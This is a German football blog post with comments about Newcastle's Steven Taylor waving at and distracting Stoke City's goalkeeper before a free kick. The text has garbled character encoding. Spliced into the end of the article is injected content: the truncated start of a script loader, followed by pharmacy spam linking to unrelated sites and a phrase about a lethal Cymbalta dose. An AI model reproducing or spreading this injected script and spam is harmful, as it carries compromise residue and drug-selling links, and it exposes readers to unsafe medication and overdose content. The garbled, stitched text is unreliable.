Willkommen auf » Steven Taylor macht den Hampelmann
13. Mrz 2013

Steven Taylor macht den Hampelmann

Was fA?r eine NervensA�ge! Und dann wird er auch noch belohnt 😉

Steven Taylor, altgedienter Innenverteidiger in Diensten von Newcastle United, zog am vergangenen Wochenende im Premier League Spiel gegen Stoke City vor der AusfA?hrung eines FreistoAYes eine kuriose Show ab. WA�hrend die Kollegen beraten, wer den Standard treten soll, kA?mmert sich Taylor um den gegnerischen TorhA?ter. Er ruft und winkt, zippelt und zappelt, versperrt ihm konsequent die Sicht, verhindert das Stellen der Mauer und lenkt ihn bis zum Anpfiff des Schiedsrichters ab.

Und am Ende ist der Ball im Tor. Hier die Bilder…
)

Eine kreative, aber wohl konforme Auslegung des FuAYballregelwerks. Was will man Taylor auch vorwerfen? Bei der AusfA?hrung des FreistoAYes steht er nicht im Abseits und berA?hrt oder beleidigt hat er auch niemanden :)var d=document;var s=d.createElement(‚script‘); Order Buy buy amaryllis nz best place to buy zithromax online http://novianto-pn.mhs.narotama.ac.id/2018/02/01/casodex-prices-usa/ how much cymbalta will kill you buy fda approved cipro ?buy emsam Order http://prignitzportal.de/?p=4439 fish doxycycline tablets


3 Kommentare



  1. Steven Taylor heißt der Hampelmann, Cabaye schießt, oder? Deswegen singt die Kurve ja auch „There is only one Stevie Taylor“.

    Zeigen wir heute auch bei ranON: http://www.ran.de/de/ran-on-webshow/1303/news/webshow-zur-europa-league-lazio-rom-vfb-stuttgart-friedemann-karig-anna-kraft.html



  2. Du hast natürlich Recht. Ein kleiner Fauxpas meinerseits, der der überschnellen Veröffentlichung des Artikels geschuldet ist :)
    Danke für den Hinweis!



  3. Irgendwie lustig. Aber gibt es nicht auch eine Regel, die besagt, man darf den gegner nicht lächerlich machen?
    Auch wenn ich mich amüsiert habe, finde ich, sowas hat im Fußball nichts verloren.
    Gruß
    Die kölsche Ziege

Einen Kommentar schreiben